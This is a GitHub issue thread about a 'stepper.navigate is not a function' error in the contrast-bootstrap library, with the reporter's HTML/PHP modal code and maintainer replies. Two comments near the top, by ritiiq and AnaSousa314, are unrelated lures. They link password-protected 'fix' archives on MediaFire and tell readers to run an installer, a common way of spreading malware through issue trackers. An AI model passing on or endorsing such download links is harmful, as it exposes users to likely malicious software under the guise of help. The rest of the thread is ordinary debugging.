### ISSUE TITLE
Stepper navigation buttons error

### ISSUE THREAD

**Issue by gmc1972** [Devwares-Team/contrast-bootstrap#2]
Hello

I«m getting this error when i want to use the navigation buttons (next and previous)

atividades1.php:279 Uncaught TypeError: stepper.navigate is not a function
    at HTMLButtonElement.onclick 

I have just copied the code in
https://www.devwares.com/docs/contrast/javascript/components/stepper/

Any help please?

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Speedwares** [comment]
Hi @gmc1972, Can you reproduce a demo of your code on [codesandbox.io ](https://codesandbox.io/)

**Comment by gmc1972** [comment]
https://codesandbox.io/p/devbox/eager-rhodes-342jl4?layout=%257B%2522sidebarPanel%2522%253A%2522EXPLORER%2522%252C%2522rootPanelGroup%2522%253A%257B%2522direction%2522%253A%2522horizontal%2522%252C%2522contentType%2522%253A%2522UNKNOWN%2522%252C%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522id%2522%253A%2522ROOT_LAYOUT%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522UNKNOWN%2522%252C%2522direction%2522%253A%2522vertical%2522%252C%2522id%2522%253A%2522cm0cvdk160007356i5tax4xc6%2522%252C%2522sizes%2522%253A%255B70%252C30%255D%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522EDITOR%2522%252C%2522direction%2522%253A%2522horizontal%2522%252C%2522id%2522%253A%2522EDITOR%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522EDITOR%2522%252C%2522id%2522%253A%2522cm0cvdk150002356i8xqvr3jb%2522%257D%255D%257D%252C%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522SHELLS%2522%252C%2522direction%2522%253A%2522horizontal%2522%252C%2522id%2522%253A%2522SHELLS%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522SHELLS%2522%252C%2522id%2522%253A%2522cm0cvdk150004356inpoq2cwm%2522%257D%255D%257D%255D%257D%252C%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522DEVTOOLS%2522%252C%2522direction%2522%253A%2522vertical%2522%252C%2522id%2522%253A%2522DEVTOOLS%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522DEVTOOLS%2522%252C%2522id%2522%253A%2522cm0cvdk160006356i0iyghx78%2522%257D%255D%257D%255D%252C%2522sizes%2522%253A%255B50%252C50%255D%257D%252C%2522tabbedPanels%2522%253A%257B%2522cm0cvdk150002356i8xqvr3jb%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0cvdk150001356ii89hza49%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522FILE%2522%252C%2522filepath%2522%253A%2522%252Fsrc%252Findex.html%2522%252C%2522state%2522%253A%2522IDLE%2522%257D%255D%252C%2522id%2522%253A%2522cm0cvdk150002356i8xqvr3jb%2522%252C%2522activeTabId%2522%253A%2522cm0cvdk150001356ii89hza49%2522%257D%252C%2522cm0cvdk160006356i0iyghx78%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0cvdk160005356iq33yy4tc%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522TASK_PORT%2522%252C%2522taskId%2522%253A%2522start%2522%252C%2522port%2522%253A1234%257D%255D%252C%2522id%2522%253A%2522cm0cvdk160006356i0iyghx78%2522%252C%2522activeTabId%2522%253A%2522cm0cvdk160005356iq33yy4tc%2522%257D%252C%2522cm0cvdk150004356inpoq2cwm%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0cvdk150003356iek6jy8bt%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522TASK_LOG%2522%252C%2522taskId%2522%253A%2522start%2522%257D%255D%252C%2522id%2522%253A%2522cm0cvdk150004356inpoq2cwm%2522%252C%2522activeTabId%2522%253A%2522cm0cvdk150003356iek6jy8bt%2522%257D%257D%252C%2522showDevtools%2522%253Afalse%252C%2522showShells%2522%253Atrue%252C%2522showSidebar%2522%253Atrue%252C%2522sidebarPanelSize%2522%253A15%257D

Speedwares ***@***.***> escreveu (terça, 27/08/2024 à(s)
17:30):

**Comment by Speedwares** [comment]
Hi @gmc1972, The documentation has been updated https://www.devwares.com/docs/contrast/javascript/components/stepper/ to reflect some new changes we made to fix this. Let me know if everything now works as expected

**Comment by gmc1972** [comment]
No

Previous
atividades1.php:363 Uncaught TypeError: stepper.navigate is not a function
    at HTMLButtonElement.onclick (atividades1.php:363:142)

Next
atividades1.php:366 Uncaught TypeError: stepper.navigate is not a function
    at HTMLButtonElement.onclick (atividades1.php:366:142)


Speedwares ***@***.***> escreveu (quarta, 28/08/2024 à(s)
18:39):

**Comment by gmc1972** [comment]
My modal

<div class="modal" id="novoModal">
    <div class="modal-dialog modal-xl">
        <div class="modal-content">
            <div class="modal-body">
                <p class="note note-primary">
                    <strong>Nota:</strong> O professor é o organizador
responsável
                </p>
                <form id="novoForm" class="was-validated" method="post">
                    <div height="800px" class="stepper" id="stepper"
style="padding-top: 10px">
                        <div class="steps-container" style="height:
125px; padding-top: 10px">
                            <div class="steps">
                                <div class="step" icon="fa
fa-pencil-alt" id="1">Informação Básica</div>
                                <div class="step" icon="fa
fa-pencil-alt" id="2">Data e Hora</div>
                                <div class="step" icon="fa
fa-pencil-alt" id="3">Dados Específicos</div>
                                <div class="step" icon="fa
fa-pencil-alt" id="4">Fim</div>
                            </div>
                        </div>
                        <div class="stepper-content-container">
                            <div class="stepper-content fade-in"
stepper-label="1">
                                <div class="w-100 h-100"
style="padding: 30px 10px; background: #f9f9f9;">
                                    <div class="my-0 mx-auto"
style="border-radius: 10px; background: #f5f5f5;">
                                        <div class="col-md-12">
                                            <div class="text-center
pt-20 pe-0 pb-10 ps-0 fw-bold" style="fontSize: 30px; color: #939393">
                                                1º Passo
                                            </div>
                                            <br>
                                            <div class="col-md-12"
style="padding-left: 10px;">
                                                <label class="text-muted mb-2">
                                                    <strong>Projeto(s)</strong>
                                                </label>
                                                <div class="col-md-12">
                                                    <select
class="selectpicker" id="idProjeto" name="idProjeto[]"
data-live-search="true" title="Escolha da seguinte lista"
data-selected-text-format="count > 6" data-width="100%" multiple
required>
                                                    </select>
                                                </div>
                                                <label class="text-muted mb-2">
                                                    <strong>Turma(s)</strong>
                                                </label>
                                                <div class="col-md-12">
                                                    <select
class="selectpicker" id="idTurma" name="idTurma[]"
data-live-search="true" title="Escolha da seguinte lista"
data-selected-text-format="count > 6" data-width="100%" multiple
required>
                                                    </select>
                                                </div>
                                                <label class="text-muted mb-2">
                                                    <strong>Docente(s)
participantes(s):</strong>
                                                </label>
                                                <div class="col-md-12">
                                                    <select
class="selectpicker" id="idProfessor" name="idProfessores[]"
data-live-search="true" title="Escolha da seguinte lista"
data-selected-text-format="count > 6" data-width="100%" multiple
required>
                                                    </select>
                                                </div>
                                                <label class="text-muted mb-1">
                                                    <strong>Atividade</strong>
                                                </label>
                                                <div class="col-md-12"
style="padding-left: 10px">
                                                    <input type="text"
style="width: 1020px" class="form-control form-control-lg"
id="atividade" name="atividade" maxlength="150"
onkeyup="countChars(this);" required/>
                                                    <p id="charNum"
class="text-muted mb-2">150 carateres disponíveis</p>
                                                </div>
                                                <div class="d-flex
w-100 align-items-center justify-content-between">
                                                    <button class="btn
btn-dark btn-block mb-3 mt-5 ms-auto" onclick="stepper.navigate('2')">
                                                        Seguinte
                                                    </button>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="stepper-content fade-in"
stepper-label="2">
                                <div class="w-100 h-100"
style="padding: 30px 10px; background: #f9f9f9;">
                                    <div class="my-0 mx-auto"
style="border-radius: 10px; background: #f5f5f5;">
                                        <div class="col-md-12">
                                            <div class="text-center
pt-20 pe-0 pb-10 ps-0 fw-bold" style="fontSize: 30px; color: #939393">
                                                2º Passo
                                            </div>
                                            <div class="col-md-12"
style="padding-left: 30px;">
                                                <p class="note note-secondary">

<strong>Nota:</strong> Deve escolher somente uma das opções
                                                </p>
                                                <div
class="form-control-lg" style="padding-left: 15px;">
                                                    <div
class="form-check form-check-inline">
                                                        <input
class="form-check-input btDate" type="radio" name="chooseDate"
id="inlineRadio3" value="Periodo" required>
                                                        <label
class="form-check-label" for="inlineRadio3">Período</label>
                                                    </div>
                                                    <div
class="form-check form-check-inline">
                                                        <label
for="inlineRadio4"></label><input class="form-check-input btDate"
type="radio" name="chooseDate" id="inlineRadio4" value="Data"
required>
                                                        <label
class="form-check-label" for="inlineRadio3">Data</label>
                                                    </div>
                                                    <div
class="invalid-feedback">Obrigatório!</div>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; display: none" id="showPeriodos">
                                                    <div class="col-6">
                                                        <div
class="form-select-lg" style="padding-left: 15px">
                                                            <label
class="text-muted mb-1">

<strong>Períodos</strong>
                                                            </label>
                                                            <select
class="selectpicker periodo" id="periodo" name="periodo"
onchange="configureDropDownLists(periodo,previsto); showSelectMes()"
title="Escolha da seguinte lista" data-width="100%" required>

<option value="0">Escolha um período</option>

<option value="1º Período">1º Período</option>

<option value="2º Período">2º Período</option>

<option value="3º Período">3º Período</option>

<option value="Todos">Todos</option>
                                                            </select>
                                                            <div
class="invalid-feedback" id="periodos">Selecione um período</div>
                                                        </div>
                                                    </div>
                                                    <div class="col-6">
                                                        <div
class="form-select-lg" style="padding-left: 23px;display: none;"
id="showPrevisto">
                                                            <label
class="text-muted mb-1">

<strong>Previsto</strong>
                                                            </label>
                                                            <select
class="form-select" id="previsto" name="previsto" style="width:
470px;" onchange="showHora()">
                                                            </select>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; display: none" id="showData">
                                                    <div
class="form-select-lg" style="padding-left: 15px; padding-right:
15px;; width: 200px">
                                                        <label
class="text-muted mb-1">

<strong>Selecione a data</strong>
                                                        </label>
                                                        <input
type="text" style="font-size: 16px;" id="datepicker2"
data-mindate="today" name="dataAtividade" class="form-control
dudp__date" onchange="showHora()" required/>
                                                        <div
class="invalid-feedback ">Escolha uma data válida.</div>
                                                    </div>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; display: none" id="showHoras">
                                                    <div
class="form-select-lg" style="padding-left: 15px; padding-right: 15px;
width: 200px">
                                                        <label
class="text-muted mb-1">

<strong>Selecione a hora</strong>
                                                        </label>
                                                        <input
type="text" class="form-control timepicker" id="picker1" name="hora"
value="08:00" data-mintime="08:00" data-maxtime="18:10" required/>
                                                        <div
class="invalid-feedback">Deve definir a hora!</div>
                                                    </div>
                                                </div>

                                                <div class="d-flex
w-100 align-items-center justify-content-between">
                                                    <button class="btn
btn-dark btn-block mb-3 mt-5" onclick="stepper.navigate('1')">
                                                        Anterior
                                                    </button>
                                                    <button class="btn
btn-dark btn-block mb-3 mt-5" onclick="stepper.navigate('3')">
                                                        Seguinte
                                                    </button>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="stepper-content fade-in"
stepper-label="3">
                                <div class="w-100 h-100"
style="padding: 30px 10px; background: #f9f9f9;">
                                    <div class=""
style="border-radius: 10px; background: #f5f5f5;">
                                        <div class="col-md-12">
                                            <div class="text-center
pt-20 pe-0 pb-10 ps-0 fw-bold" style="fontSize: 30px; color: #939393">
                                                3º Passo
                                            </div>
                                            <div class="col-md-12"
style="padding-left: 30px;">
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">

<strong>Objetivos</strong>
                                                    </label>
                                                    <textarea
class="form-control" rows="3" id="objetivos" name="objetivos"
maxlength="500" onkeyup="countCharsGrupoObjetivos(this);"
required></textarea>
                                                    <p
id="charNumGrupoObj" class="text-muted mb-2">500 carateres
disponíveis</p>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">

<strong>Participantes</strong>
                                                    </label>
                                                    <textarea
class="form-control" rows="3" id="participantes" name="participantes"
maxlength="250" onkeyup="countCharsGrupoParticipantes(this);"
required></textarea>
                                                    <p
id="charNumParticipantes" class="text-muted mb-2">250 carateres
disponíveis</p>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">
                                                        <strong>A
atividade vai necessitar de interrupção de aulas?</strong>
                                                    </label>
                                                    <div class="form-check">
                                                        <input
type="radio" class="form-check-input" id="radio1" name="haveClasses"
value="Sim" required>
                                                        <label
class="form-check-label" style="font-size: 16px;"
for="radio1">Sim</label>
                                                    </div>
                                                    <div class="form-check">
                                                        <input
type="radio" class="form-check-input" id="radio2" name="haveClasses"
value="Não" required>
                                                        <label
class="form-check-label" style="font-size: 16px;"
for="radio2">Não</label>
                                                    </div>
                                                    <div class="form-check">
                                                        <input
type="radio" class="form-check-input" id="radio3" name="haveClasses"
value="A definir" required>
                                                        <label
class="form-check-label" style="font-size: 16px;" for="radio3">A
definir</label>
                                                    </div>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">
                                                        <strong>Grupo
Alvo</strong>
                                                    </label>
                                                    <input type="text"
class="form-control" id="grupoAlvo" name="grupoAlvo" maxlength="150"
onkeyup="countCharsGrupoAlvo(this);" required/>
                                                    <p
id="charNumGrupoAlvo" class="text-muted mb-2">150 carateres
disponíveis</p>
                                                </div>
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">

<strong>Orçamento</strong>
                                                    </label>
                                                    <input
type="number" class="form-control" id="orcamento" name="orcamento"
placeholder="10" maxlength="20" required/>
                                                </div>
                                            </div>
                                            <div class="d-flex w-100
align-items-center justify-content-between">
                                                <button class="btn
btn-dark btn-block mb-3 mt-5" onclick="stepper.navigate('2')">
                                                    Anterior
                                                </button>
                                                <button class="btn
btn-dark btn-block mb-3 mt-5" onclick="stepper.navigate('4')">
                                                    Seguinte
                                                </button>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="stepper-content fade-in"
stepper-label="4">
                                <div class="w-100 h-100"
style="padding: 30px 10px; background: #f9f9f9;">
                                    <div class=""
style="border-radius: 10px; background: #f5f5f5;">
                                        <div class="col-md-12">
                                            <div class="text-center
pt-20 pe-0 pb-10 ps-0 fw-bold" style="fontSize: 30px; color: #939393">
                                                4º Passo
                                            </div>
                                            <div class="col-md-12"
style="padding-left: 30px;">
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">
                                                        <strong>Onde
se vai desenrolar</strong>
                                                    </label>
                                                    <input type="text"
class="form-control" id="local" name="local" maxlength="80" required/>
                                                </div>
                                                <br>
                                                <div class="col-md-12"
style="padding-left: 15px; padding-right: 15px">
                                                    <label
class="text-muted mb-1">

<strong>Observações</strong>
                                                    </label>
                                                    <textarea
class="form-control" rows="5" id="obs" name="obs" value="Nada a
referir" onkeyup="countCharsOBS(this);" maxlength="5000"></textarea>
                                                    <p
id="charNumOBS">5000 carateres disponíveis</p>
                                                </div>
                                                <div class="col-md-12">
                                                    <input
type="hidden" class="form-control" name="type" id="type" value="nova">
                                                </div>
                                                <div class="col-md-12">
                                                    <input
type="hidden" class="form-control" name="idProfessor" id="idProfessor"
value="<?php echo $idProfessor; ?>">
                                                </div>
                                            </div>
                                            <div class="d-flex w-100
align-items-center justify-content-between">
                                                <button class="btn
btn-dark btn-block mb-3 mt-5" onclick="stepper.navigate('2')">
                                                    Anterior
                                                </button>
                                            </div>
                                        </div>
                                        <div class="modal-footer">
                                            <div class="modal-footer">
                                                <button type="submit"
id="newBtn" class="btn btn-secondary waves-effect">Registar <i
class="fa fa-paper-plane ml-1"></i></button>
                                                <button type="button"
class="btn btn-secondary waves-effect" data-bs-dismiss="modal">Fechar
</button>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>

The other scrips are loaded in first php menu

<script src="https://cdn.jsdelivr.net/npm/cdbootstrap/js/cdb.min.js"></script>

<script>

$(document).ready(function () {

    const stepperElement = document.querySelector("#stepper");
    const stepper = new CDB.Stepper(stepperElement);


})


</script>




Gil Carvalho ***@***.***> escreveu (quarta, 28/08/2024 à(s)
22:12):

**Comment by Speedwares** [comment]
Hi, here is a link to a live demo https://codesandbox.io/p/devbox/eloquent-mirzakhani-c9q58c

**Comment by Speedwares** [comment]
Closing this, the issue has been resolved
